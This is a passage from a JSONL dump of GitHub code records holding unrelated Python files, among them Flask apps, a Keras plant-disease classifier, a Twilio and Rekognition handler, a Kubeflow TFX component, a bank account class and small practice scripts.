request.form.get(\"surname\")\n name = request.form.get(\"name\")\n email = request.form.get(\"email\")\n # Validation einbauen\n db.execute(\"insert into passengers (surname, name, email, flight_id) values (:surname, :name, :email, :flight_id)\", \n {\"surname\": surname, \"name\": name, \"email\": email, \"flight_id\": flight_id})\n db.commit()\n except ValueError:\n error = \"Please select a flight!\"\n return render_template(\"booker.html\", flights=flights, error=error)\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"login.html\")\n\n@app.route(\"/addFlight\", methods=[\"GET\", \"POST\"])\ndef addFlight():\n if request.method == \"POST\":\n origin = request.form.get(\"o\")\n destination = request.form.get(\"dest\")\n duration = request.form.get(\"dur\")\n db.execute(\"insert into flights (origin, destination, duration) values (:origin, :destination, :duration)\", \n {\"origin\": origin, \"destination\": destination, \"duration\": duration})\n print(f\"Added flight from {origin} to {destination} lasting {duration} minutes\")\n db.commit()\n return render_template(\"addFlight.html\")\n","repo_name":"Thien-An-Ngo/harvardCourse","sub_path":"myProjects/tests/test1/src/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39723414482","text":"\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nimport re\nimport torch\nfrom model import ChatModel\n\nwith open('data.txt', 'r') as file:\n data = file.read()\n\ndata = re.sub('\\n+', '\\n', data)\n# Parse the text into a list of question-answer pairs\nqa_pairs = data.strip().split('\\n')\n\n# Split each pair into a question and an answer\nqa_pairs = [pair.split(': ')[1] for pair in qa_pairs]\nq = []\nans = []\naq = True\nfor pair in range(len(qa_pairs)):\n #pair -= 1A\n if pair % 2 == 0:\n q.append(qa_pairs[pair])#.split(\";;\"))\n else:\n ans.append(qa_pairs[pair])\n\nmodel = ChatModel(q,ans,device=\"cpu\")\n\n\n@app.route('/predict', methods=['GET'])\ndef predict():\n # Get the 'message' parameter from the query string\n message = request.args.get('message')\n print(message)\n return jsonify(answer=model.chat(str(message)))\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)\n","repo_name":"sadik-abd/low_end_chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29085951938","text":"#!/usr/bin/env python\nimport boto3\nfrom kubernetes import client, config, watch\nfrom random import randint\n\ndef createJob(api, counter):\n jobName = f\"job-search-worker-{counter}\"\n\n # Create and configure a container\n container = client.V1Container(\n name=\"c\",\n image=\"bigtexasdork/job-search-worker\",\n resources=client.V1ResourceRequirements(\n limits={\"memory\": \"500M\", \"cpu\": \"1\"},\n requests={\"memory\": \"300M\", \"cpu\": \".5\"}\n )\n )\n\n # Create and configure a spec section\n template = client.V1PodTemplateSpec(\n metadata=client.V1ObjectMeta(labels={\"app\": \"search-worker\"}),\n spec=client.V1PodSpec(\n containers=[container],\n restart_policy=\"OnFailure\"\n )\n )\n \n # Create and configure a Job spec\n jobSpec = client.V1JobSpec(\n completions=1,\n parallelism=1,\n template=template,\n ttl_seconds_after_finished=15\n )\n\n # Create the Job\n job = client.V1Job(\n 
metadata=client.V1ObjectMeta(name=jobName),\n spec=jobSpec\n )\n\n api.create_namespaced_job(\n namespace=\"default\",\n body=job\n )\n\n print(f\"Create job: {jobName}\")\n\ndef main():\n config.load_kube_config()\n api = client.BatchV1Api()\n\n sqs = boto3.resource('sqs')\n\n queue = sqs.get_queue_by_name(QueueName='a-kube-test-queue.fifo')\n\n cntr = 0 # used for job name uniqueness\n data = [line.strip() for line in open(\"50words\", 'r')]\n for msg in data:\n cntr += 1\n response = queue.send_message(\n MessageBody=msg + str(randint(0,999)), # randomize the msg\n MessageGroupId=\"travelers\", # needed for FIFO\n MessageAttributes={\n 'Sleep': {\n 'StringValue': str(randint(10,29)),\n 'DataType': 'Number'\n }\n }\n )\n\n print('MessageId: {0}'.format(response.get('MessageId')))\n print('MD5OfMessageBody: {0}'.format(response.get('MD5OfMessageBody')))\n createJob(api, cntr)\n\nif __name__ == '__main__':\n main()\n","repo_name":"BigTexasDork/k8s-job-poc","sub_path":"oneJobPerMessage.py","file_name":"oneJobPerMessage.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30984914466","text":"from dataclasses import (\n asdict,\n dataclass,\n field,\n)\nfrom datetime import (\n datetime,\n timedelta,\n)\n\nimport jwt\nfrom utils import (\n dict_factory,\n get_scopes,\n)\n\nfrom popug_schema_registry.models.v1.task_created_event_schema import UserRoles\nfrom popug_sdk.conf import settings\n\n\n@dataclass\nclass TokenData:\n public_id: str\n username: str\n email: str\n role: UserRoles\n scopes: list[str] = field(init=False)\n\n def __post_init__(self) -> None:\n self.scopes = get_scopes(self.role)\n\n def generate_token(self, expires_delta: int) -> str:\n encode_data = asdict(self, dict_factory=dict_factory)\n encode_data[\"exp\"] = datetime.utcnow() + timedelta(expires_delta)\n\n token: str = jwt.encode( # type: ignore\n encode_data,\n settings.security.secret_key,\n algorithm=settings.security.algorithm,\n )\n\n return token\n","repo_name":"Drozdetskiy/popug_jira","sub_path":"popug_auth/src/token_data.py","file_name":"token_data.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"2590275077","text":"\nimport urllib2\nimport json\n\nfrom datetime import datetime, timedelta\n\nclass timeSync:\n syncUrl = r'http://www.portvisibility.co.uk/visibility/tools/showTime.php'\n \n def __init__(self):\n response = urllib2.urlopen(self.syncUrl)\n timeJson = response.read()\n \n self.time = json.loads(timeJson)['time']\n self.date = json.loads(timeJson)['date']\n \n def printTimeStr(self):\n print(self.dateTime)\n \n def getTimeWithTimezoneOffset(self, timezoneOffset):\n t = datetime.strptime(self.time, '%H:%M:%S %Z')\n d = datetime.strptime(self.date, '%Y-%m-%d')\n t = t + timedelta(hours=timezoneOffset)\n validatedTime = '%d-%02d-%02d %02d:%02d:%02d' % (d.year, d.month, d.day, t.hour, t.minute, t.second)\n \n return validatedTime\n ","repo_name":"RedSpiderMkV/Windows-Time-Update","sub_path":"src/Legacy/windowsTimeSync.py","file_name":"windowsTimeSync.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"12366722422","text":"#Import neccessary packages\n\nfrom os import listdir\nimport 
sys\n#sys.path.append(\"/opt/anaconda2/lib/python2.7/site-packages/cv2\")\n#/usr/local/lib/python2.7/dist-packages/cv2\n\n#sys.path.append(\"/usr/local/lib/python3.5/dist-packages/matplotlib\")\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n#from matplotlib import pyplot as plt\n\nfrom keras.models import Sequential\n#from keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\n#from keras.layers.core import Activation, Flatten, Dropout, Dense\nfrom keras.layers.core import Activation, Flatten, Dense\nfrom keras import backend as K\nfrom keras.optimizers import Adam\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator,img_to_array\nfrom keras.utils import to_categorical\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import LabelBinarizer\n#from sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.model_selection import train_test_split\n\n\n#Initialise a few vars\nEPOCHS = 10\nINIT_LR = 1e-3\nBS = 32\ndefault_image_size = tuple((256, 256))\nimage_size = 0\ndirectory_root = '/home/ai16/project/main_project/Data/Plantvillage'\nwidth=256\nheight=256\ndepth=3\n\n#Function to convert images to array\ndef convert_image_to_array(image_dir):\n    try:\n        image = cv2.imread(image_dir)\n        if image is not None :\n            image = cv2.resize(image, default_image_size)   \n            return img_to_array(image)\n        else :\n            return np.array([])\n    except Exception as e:\n        #print(f\"Error : {e}\")\n        print(\"convert_image_to_array() : Error when converting Image to Array:\"+str(e))\n        return None\n\n#Fetch images from directory and convert each to an array...assign labels to it (folder name)\nimage_list, label_list = [], []\ntry:\n    print(\"[INFO] Loading images from folders...\")\n    root_dir = listdir(directory_root)\n    for plant_folder in root_dir :\n        print(\"Processing images from folder... ->: \"+ plant_folder)\n        #below will return list of image files within the folder\n        #plant_disease_folder_list = listdir(directory_root+\"/\"+plant_folder)\n        Images_In_Folder = listdir(directory_root+\"/\"+plant_folder)\n        #print \"------------------\"\n        #print(\"\\n\")\n\n        #New Code\n        #for image in plant_disease_folder_list[:200]:\n        for image in Images_In_Folder:\n            image_filename = directory_root+\"/\"+plant_folder+\"/\"+image   \n            if image_filename.endswith(\".jpg\") == True or image_filename.endswith(\".JPG\") == True:\n                #print \"Image filename (Abs. path) ->\" + image_filename  \n                image_list.append(convert_image_to_array(image_filename))\n                label_list.append(plant_folder)\n\n\n\n    print(\"[INFO] Image loading completed from all directories....\")  \nexcept Exception as e:\n    print(\"Try...Catch: Error when loading/processing images...: \"+str(e))\n\n\"\"\"\nprint(\"First Image in Image list...\")\nprint(image_list[0])\nprint(\"shape...\")\nprint(image_list[0].shape)\n\nprint(\"Corres. label in Label list...\")\nprint(label_list)\nprint(\"Length of label_list...\")\nprint(len(label_list))\n\"\"\"\n\n#Get Size of Processed Image\nTot_No_Of_Images = len(image_list)  \nprint(\"Total No. of Images :->\"+str(Tot_No_Of_Images))\n\n#Convert labels to numeric values (Ex. 0,1,2,3...based on categories)\nle=LabelEncoder()\nlabel_list_num=le.fit_transform(label_list)\nlabel_classes = le.classes_\n#print(label_classes)\n\n\n#print label_list_num\nprint(\"Total number of unique categories...=\"+str(len(np.unique(label_list_num))))\nprint(np.unique(label_list_num))\nn_classes=len(np.unique(label_list_num))\n\n\n#convert to binary values (one hot encoding)\nlabel_list_num_bin=to_categorical(label_list_num)\n#print(\"After binary conversion...\")\n#print(label_list_num_bin)\n\n\n#Tensor Flow compatible (4-d array) and Normalize the pixels\n#Output will also follow the patterns..\n#np_image_list = np.array(image_list, dtype=np.float16) / 225.0\nnp_image_list = np.array(image_list, dtype=np.float16) / 255.0\n\n\"\"\"\nprint(\"Shape of np_image_list....\")\nprint(np_image_list.shape)\nprint(\"Shape of ..label_list_num_bin..\")\nprint(label_list_num_bin.shape)\n\"\"\"\n\n#Create Train and Test set\nprint(\"[INFO] Splitting data to train, test\")\n#x_train, x_test, y_train, y_test = train_test_split(np_image_list, image_labels, test_size=0.2, random_state = 42) \n\nx_train, x_test, y_train, y_test = train_test_split(np_image_list, label_list_num_bin, test_size=0.2, random_state = 42) \n\n\n'''\nprint \"x_train\"\nprint x_train\nprint \"x_test\"\nprint x_test\nprint \"y_train\"\nprint y_train\nprint \"y_test\"\nprint y_test\n'''\n\n#Image Augmentation\naug = ImageDataGenerator(\n    rotation_range=25, \n    width_shift_range=0.1,\n    height_shift_range=0.1, \n    shear_range=0.2, \n    zoom_range=0.2,\n    horizontal_flip=True, \n    fill_mode=\"nearest\")\n\n\n#Build CNN layers\nmodel = Sequential()\n\n#width=256, height=256, depth=3\n\ninputShape = (height, width, depth)\n\n#For Tensorflow....channels_last........For Theano...channels_first\n#(samples,rows,cols,channels)....channels dimension is last param (index = 3)\n#Defines where is the 'channels' data in the input data\nprint(\"Image data format...\")\nprint(K.image_data_format())\n\nchanDim = -1\nif K.image_data_format() == \"channels_first\":\n    inputShape = (depth, height, width)\n    chanDim = 1\n\n#model.add(Conv2D(32, (3, 3), padding=\"same\",input_shape=inputShape))\nmodel.add(Conv2D(32, (3, 3), input_shape=inputShape))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\nmodel.add(MaxPooling2D(pool_size=(3, 3)))\n#model.add(Dropout(0.25))\n\n#model.add(Conv2D(64, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\n\n#model.add(Conv2D(64, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\n\n#model.add(Conv2D(128, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\n\n#model.add(Conv2D(128, (3, 3), padding=\"same\"))\nmodel.add(Conv2D(128, (3, 3)))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization(axis=chanDim))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\n\nmodel.add(Flatten())\n\n#Fully Connected Layer\n#model.add(Dense(1024))\nmodel.add(Dense(128))\nmodel.add(Activation(\"relu\"))\n#model.add(BatchNormalization())\n#model.add(Dropout(0.5))\n\n#Output layer\nmodel.add(Dense(n_classes))\nmodel.add(Activation(\"softmax\"))\n\nmodel.summary()\n\n#opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)\nopt = Adam(lr=INIT_LR)\n\n# distribution...Compile the model\n#model.compile(loss=\"binary_crossentropy\", optimizer=opt,metrics=[\"accuracy\"])\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt,metrics=[\"accuracy\"])\n\n#BS = 1\n\n# train the network\nprint(\"[INFO] training network...\")\nhistory = model.fit_generator(\n    aug.flow(x_train, y_train, batch_size=BS),\n    validation_data=(x_test, y_test),\n    steps_per_epoch=len(x_train) // BS,\n    epochs=EPOCHS, verbose=1\n    )\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(acc) + 1)\n\n\n\"\"\"\nprint \"Training Accuracy...\"+str(acc)\nprint \"Validation Accuracy...\"+str(val_acc)\nprint \"Training loss...\"+str(loss)\nprint \"Validation loss...\"+str(val_loss)\nprint \"Epochs...\"+str(epochs)\n\"\"\"\n\n#Plot the train and val curve\n#Train and validation accuracy\n\nplt.plot(epochs, acc, 'b', label='Training accuracy')\nplt.plot(epochs, val_acc, 'r', label='Validation accuracy')\nplt.title('Training and Validation accuracy')\nplt.legend()\nplt.figure()\n\n#Train and validation loss\nplt.plot(epochs, loss, 'b', label='Training loss')\nplt.plot(epochs, val_loss, 'r', label='Validation loss')\nplt.title('Training and Validation loss')\nplt.legend()\nplt.show()\n\n\n#Model Accuracy\nprint(\"[INFO] Calculating model accuracy\")\nscores = model.evaluate(x_test, y_test)\nprint(\"Printing scores...\")\nprint(scores)\nprint(\"Test Loss: \"+str(scores[0]*100))\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[0], scores[0]*100))\nprint(\"Test Accuracy: \"+str(scores[1]*100))\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n#print \"Metrics Names :\"\n#for m in model.metrics_names:\n#    print m\n\n#Save the model to disk\nprint(\"[INFO] Saving model...\")\nmodel.save(\"cnn_model.h5\")\n\n","repo_name":"unnikrishnancs/ComputerVision_01_PlantDiseaseClassification","sub_path":"PYTHON3_Final_plantdis_classi_v2.py","file_name":"PYTHON3_Final_plantdis_classi_v2.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"5965412702","text":"import os\nfrom pathlib import Path\nimport shutil\nimport requests\n\nfrom twilio.twiml.messaging_response import Body, Message, Redirect, MessagingResponse\n#from googletrans import Translator\nimport boto3\n\nrekogClient = boto3.client('rekognition')\n\n\n\ndef httpWebHooktoTwilioURL(event, context):\n    print(event) #To have event come up in cloudwatchLogs\n    numMedia = int(event['body']['NumMedia'])\n    if (numMedia == 1):\n        if (event['body']['MediaContentType0']=='image/jpeg'):\n            image_url = event['body']['MediaUrl0']\n            filename = os.path.join(os.getcwd(),Path(\"../../tmp/{}.jpg\".format(event['body']['MessageSid'])))\n            retrieveContent = requests.get(image_url, stream = True)\n            if retrieveContent.status_code == 200:\n                retrieveContent.raw.decode_content = True #Required to ensure file size is not zero\n                with open(filename,'wb') as f: #writing into file\n                    shutil.copyfileobj(retrieveContent.raw, f)\n\n                with open(filename,'rb') as image:\n                    rekogResponse = rekogClient.recognize_celebrities(Image={'Bytes': image.read()})\n                    print(rekogResponse)\n                    bodyContent = \"{} celebrities found\".format(len(rekogResponse['CelebrityFaces']))\n                    if (len(rekogResponse['CelebrityFaces']) > 0):\n                        for celeb in rekogResponse['CelebrityFaces']:\n                            bodyContent += \"{} {} : {}% match confidence\".format(os.linesep,celeb['Name'],celeb['MatchConfidence'])\n        else:\n            
bodyContent = \"Image type is not JPEG or PNG. Please send only one of these.\"\n elif (numMedia > 1) :\n bodyContent = \"Please only send one image at a time \"\n elif (numMedia == 0) :\n bodyContent = \"Hi, please attach a JPEG or PNG image for facial recognition of celebrities.\"\n try:\n #translator = Translator()\n response = MessagingResponse()\n message = Message()\n #message.body(translator.translate(event['body']['Body'],dest='hi').text) # Pre-tested on googletrans\n message.body(bodyContent)\n response.append(message)\n return response.to_xml()\n except:\n return \"An Error has occured. Please contact support.\"\n","repo_name":"anilmenon14/AWSRekognition_WhatsApp_Integration","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"71969382269","text":"from kfp.components import InputPath, OutputPath\n\n\ndef ExampleValidator(\n statistics_path: InputPath('ExampleStatistics'),\n schema_path: InputPath('Schema'),\n\n anomalies_path: OutputPath('ExampleAnomalies'),\n):\n \"\"\"\n A TFX component to validate input examples.\n\n The ExampleValidator component uses [Tensorflow Data\n Validation](https://www.tensorflow.org/tfx/data_validation) to\n validate the statistics of some splits on input examples against a schema.\n\n The ExampleValidator component identifies anomalies in training and serving\n data. The component can be configured to detect different classes of anomalies\n in the data. It can:\n - perform validity checks by comparing data statistics against a schema that\n codifies expectations of the user.\n - detect data drift by looking at a series of data.\n - detect changes in dataset-wide data (i.e., num_examples) across spans or\n versions.\n\n Schema Based Example Validation\n The ExampleValidator component identifies any anomalies in the example data by\n comparing data statistics computed by the StatisticsGen component against a\n schema. The schema codifies properties which the input data is expected to\n satisfy, and is provided and maintained by the user.\n\n Please see https://www.tensorflow.org/tfx/data_validation for more details.\n\n Args:\n statistics: A Channel of 'ExampleStatistics` type. This should contain at\n least 'eval' split. Other splits are ignored currently.\n schema: A Channel of \"Schema' type. 
_required_\n Returns:\n anomalies: Output channel of 'ExampleAnomalies' type.\n\n Either `stats` or `statistics` must be present in the arguments.\n \"\"\"\n from tfx.components.example_validator.component import ExampleValidator as component_class\n\n #Generated code\n import json\n import os\n import tensorflow\n from google.protobuf import json_format, message\n from tfx.types import Artifact, channel_utils, artifact_utils\n\n arguments = locals().copy()\n\n component_class_args = {}\n\n for name, execution_parameter in component_class.SPEC_CLASS.PARAMETERS.items():\n argument_value_obj = argument_value = arguments.get(name, None)\n if argument_value is None:\n continue\n parameter_type = execution_parameter.type\n if isinstance(parameter_type, type) and issubclass(parameter_type, message.Message): # Maybe FIX: execution_parameter.type can also be a tuple\n argument_value_obj = parameter_type()\n json_format.Parse(argument_value, argument_value_obj)\n component_class_args[name] = argument_value_obj\n\n for name, channel_parameter in component_class.SPEC_CLASS.INPUTS.items():\n artifact_path = arguments[name + '_path']\n if artifact_path:\n artifact = channel_parameter.type()\n artifact.uri = artifact_path + '/' # ?\n if channel_parameter.type.PROPERTIES and 'split_names' in channel_parameter.type.PROPERTIES:\n # Recovering splits\n subdirs = tensorflow.io.gfile.listdir(artifact_path)\n artifact.split_names = artifact_utils.encode_split_names(sorted(subdirs))\n component_class_args[name] = channel_utils.as_channel([artifact])\n\n component_class_instance = component_class(**component_class_args)\n\n input_dict = {name: channel.get() for name, channel in component_class_instance.inputs.get_all().items()}\n output_dict = {name: channel.get() for name, channel in component_class_instance.outputs.get_all().items()}\n exec_properties = component_class_instance.exec_properties\n\n # Generating paths for output artifacts\n for name, artifacts in output_dict.items():\n base_artifact_path = arguments[name + '_path']\n # Are there still cases where output channel has multiple artifacts?\n for idx, artifact in enumerate(artifacts):\n subdir = str(idx + 1) if idx > 0 else ''\n artifact.uri = os.path.join(base_artifact_path, subdir) # Ends with '/'\n\n print('component instance: ' + str(component_class_instance))\n\n #executor = component_class.EXECUTOR_SPEC.executor_class() # Same\n executor = component_class_instance.executor_spec.executor_class()\n executor.Do(\n input_dict=input_dict,\n output_dict=output_dict,\n exec_properties=exec_properties,\n )\n\n\nif __name__ == '__main__':\n import kfp\n kfp.components.func_to_container_op(\n ExampleValidator,\n base_image='tensorflow/tfx:0.21.4',\n output_component_file='component.yaml'\n )\n","repo_name":"kubeflow/kfp-tekton-backend","sub_path":"components/tfx/ExampleValidator/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"3013708094","text":"\"\"\"Assignment 5: Bank Account\"\"\"\nimport datetime as dt\n\nclass Transaction:\n \"\"\"\n A transaction class represents a monetary transaction event.\n It has two properties: an amount, and a timestamp.\n \"\"\"\n # Transaction is constructed with a required 'amount' argument however the initialized\n # timestamp is either None by default (current datetime is used) or a user defined\n # datetime value entered for the timestamp argument for every new Transaction() 
object.\n def __init__(self, amount, timestamp=None):\n self.amount = amount\n if not isinstance(timestamp, dt.datetime):\n self.timestamp = dt.datetime.now()\n else:\n self.timestamp = timestamp\n\n def __str__(self):\n \"\"\"Returns transaction with timestamp.\"\"\"\n dt_formatted = '{:%Y-%m-%d}'.format(self.timestamp)\n if self.amount < 0:\n amt_formattted = '-${0:.2f}'.format(self.amount * -1)\n elif self.amount > 0:\n amt_formattted = '+${0:.2f}'.format(self.amount)\n else:\n amt_formattted = '${0:.2f}'.format(self.amount)\n # Returns amount, time of transaction.\n return f'{dt_formatted}: {amt_formattted}'\n\n def __repr__(self):\n \"\"\"Returns expression which can be used to recreate this object.\"\"\"\n dt_formatted = '{:%Y_%#m_%#d}'.format(self.timestamp)\n # Returns amount, time of transaction.\n # String formatted especially to handle return sum of all transactions\n return f'[{self.amount}, ({dt_formatted})]'\n\nclass Account:\n \"\"\"\n The account class represents a bank account.\n It is constructed without any arguments.\n \"\"\"\n # Account is constructed without any arguments however the initialized\n # balance is zero or $0.00 for every new Account() object.\n def __init__(self):\n self.transactions = [] # array stores list of all transacations on Account() object\n self.balance = 0.00 # self.balance added solely for balance/testing purposes\n\n def deposit(self, amount):\n \"\"\"make deposit to account\"\"\"\n #ensure deposit amount is converted to a positive value\n if amount < 0:\n amount = amount * -1\n transaction = Transaction(amount)\n self.transactions.append(transaction)\n self.balance += amount\n\n def withdraw(self, amount):\n \"\"\"make withdrawal from account\"\"\"\n if amount < 0:\n amount = amount * -1\n if (self.balance - amount) < 0:\n print(\"Warning: account in overdrawn position \\nCheck account balance!\")\n #ensure withdraw amount is converted to a negative value\n amount = amount * -1\n transaction = Transaction(amount)\n self.transactions.append(transaction)\n self.balance += amount\n\n def get_balance(self):\n \"\"\"display the current balance in account object\"\"\"\n # return the current value of the balance\n return round(self.balance, 2) * 1.00\n\n\n def get_transactions(self):\n \"\"\"display list of transations in account object\"\"\"\n my_list = self.transactions\n print('\\n'.join(map(str, my_list)))\n","repo_name":"lopegeor1/project-5-banking-lopegeor1","sub_path":"banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71472126909","text":"# open the file with the puzzle input\nf = open('./puzzle_input.txt')\n\n# number of assignment pairs where one range fully contains the other\ncontains = 0\n\ndef doesContain(a, b):\n minA = a[0]\n maxA = a[1]\n minB = b[0]\n maxB = b[1]\n\n return (minA <= minB) and (maxA >= maxB)\n\n# loop through the puzzle input\nwhile(True):\n # read next line\n line = f.readline()\n\n # EOF, break out of the loop\n if line == \"\":\n break\n \n # split assignment pair on the \",\" into range pairs\n rangePairs = line.strip().split(',')\n # split range pairs on the \"-\" into min/max values and map to ints\n rangeA = list(map(int, rangePairs[0].split('-')))\n rangeB = list(map(int, rangePairs[1].split('-')))\n\n # test if rangeA contains rangeB or rangeB contains rangeA\n if doesContain(rangeA, rangeB) or doesContain(rangeB, rangeA):\n contains += 1\n\nprint(\"Number of assignment 
pairs where one range fully contains the other\")\nprint(contains)\n","repo_name":"gcgarrett/advent-of-code-2022","sub_path":"day4/contains.py","file_name":"contains.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"7991924196","text":"#def discounted(price, discount, max_discount=20):\nwhile True:\n    try:\n        price = abs(float(input()))\n        discount = abs(float(input()))\n        max_discount = abs(float(input()))\n        if max_discount > 99:\n            raise ValueError('Maximum discount is too large')\n        if discount >= max_discount:\n            print('the price stays the same: ' + str(price))\n        else:\n            print('discounted price: ' + str(price - (price * discount / 100)) + '\\ndiscount amount = ' + str(price * discount / 100))\n    except (ValueError):\n        print('Please enter a number')\n    except (KeyboardInterrupt):\n        print('Come back, we will code some more') \n        break\n    ","repo_name":"KomaKomar/lesson1","sub_path":"while2.py","file_name":"while2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"18917507222","text":"from sqlalchemy import JSON, BigInteger, Column, ForeignKey, Integer, LargeBinary, Numeric\nfrom sqlalchemy.types import String, TypeDecorator\n\nfrom .base import Base\n\n\nclass HexByteString(TypeDecorator):\n    \"\"\"\n    Convert Python bytestring to string with hexadecimal digits and back for storage.\n    \"\"\"\n\n    impl = String\n    cache_ok = True\n\n    def process_bind_param(self, value, dialect):\n        if isinstance(value, bytes):\n            return value.hex()\n\n        elif isinstance(value, str):\n            return bytes.fromhex(value.replace(\"0x\", \"\").lower()).hex()\n\n        else:\n            raise TypeError(f\"HexByteString columns support only bytes values: {value}\")\n\n    def process_result_value(self, value, dialect):\n        return bytes.fromhex(value.replace(\"0x\", \"\")) if value else None\n\n\nclass Blocks(Base):\n    __tablename__ = \"blocks\"  # type: ignore\n\n    hash = Column(HexByteString, primary_key=True, nullable=False)\n    num_transactions = Column(Integer, nullable=False)\n    number = Column(Integer, nullable=False, index=True)\n    parent_hash = Column(HexByteString, nullable=False)\n    size = Column(Integer, nullable=False)\n    timestamp = Column(BigInteger, index=True)\n    gas_limit = Column(Integer, nullable=False)\n    gas_used = Column(Integer, nullable=False)\n    base_fee = Column(BigInteger, nullable=False)\n    difficulty = Column(Numeric(scale=0), nullable=False)\n    total_difficulty = Column(Numeric(scale=0), nullable=False)\n\n\nclass Transactions(Base):\n    __tablename__ = \"transactions\"  # type: ignore\n\n    txn_hash = Column(HexByteString, primary_key=True, nullable=False)\n    sender = Column(HexByteString, nullable=True)\n    receiver = Column(HexByteString, nullable=True)\n    gas_limit = Column(Numeric(scale=0), nullable=True)\n    block_hash = Column(HexByteString, ForeignKey(\"blocks.hash\", ondelete=\"CASCADE\"))\n    nonce = Column(Integer, nullable=True)\n    value = Column(Numeric(scale=0), nullable=True)\n    data = Column(LargeBinary, nullable=True)\n    type = Column(String, nullable=True)\n    signature = Column(HexByteString, nullable=True)\n\n\nclass ContractEvents(Base):\n    __tablename__ = \"contract_events\"  # type: ignore\n\n    id = Column(Integer, primary_key=True, index=True)\n    event_name = Column(String, nullable=False, index=True)\n    contract_address = Column(HexByteString, nullable=False, index=True)\n    event_arguments = Column(JSON, index=True)\n    transaction_hash = Column(HexByteString, 
nullable=False, index=True)\n block_number = Column(Integer, nullable=False, index=True)\n block_hash = Column(HexByteString, nullable=False, index=True)\n log_index = Column(Integer, nullable=False, index=True)\n transaction_index = Column(Integer, nullable=False, index=True)\n","repo_name":"ApeWorX/ape","sub_path":"src/ape_cache/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":736,"dataset":"github-code","pt":"6"} +{"seq_id":"5037349317","text":"tuple_1 = (1, 2, 3)\ntuple_2 = ('one', 'hello')\ntuple_3 = (3, 2.3, 'three')\n\nprint(tuple_1[1])\nprint(type(tuple_1))\nprint(tuple_2)\nprint(tuple_3)\n\n\ncomputer = {\n 'CPU': 'AMD',\n 'RAM': 16000,\n 'SDD': 240,\n 'VideoCard': 'GeForce 1080ti',\n 'size': {'width': 350, 'height': 560, 'length': 420}\n}\n\npc_tuple = ('CPU: AMD', 'RAM: 16000', 'SDD: 240', 'VideoCard: GeForce 1080ti')\ncpu, ram, ssd, vga = pc_tuple\nprint(cpu, ram, ssd, vga )","repo_name":"NailKarimov/PhytonUdemyCourseTasks","sub_path":"UdemyWorks/4_Directory/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25354254824","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the minimumSwaps function below.\n\ndef minimumSwaps(arr):\n count=0\n n=len(arr)\n diction={}\n arr=[x-1 for x in arr]\n for ind, elem in enumerate(arr):\n diction[elem] = ind\n visited = [False] * n\n for elem, ind in sorted(diction.items(), key=lambda x: x[0]):\n if visited[elem] or elem == ind:\n continue\n cycles = 0\n i = elem\n while not visited[i]:\n visited[i] = True\n i = diction[i]\n cycles += 1\n count += cycles - 1\n return count\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, 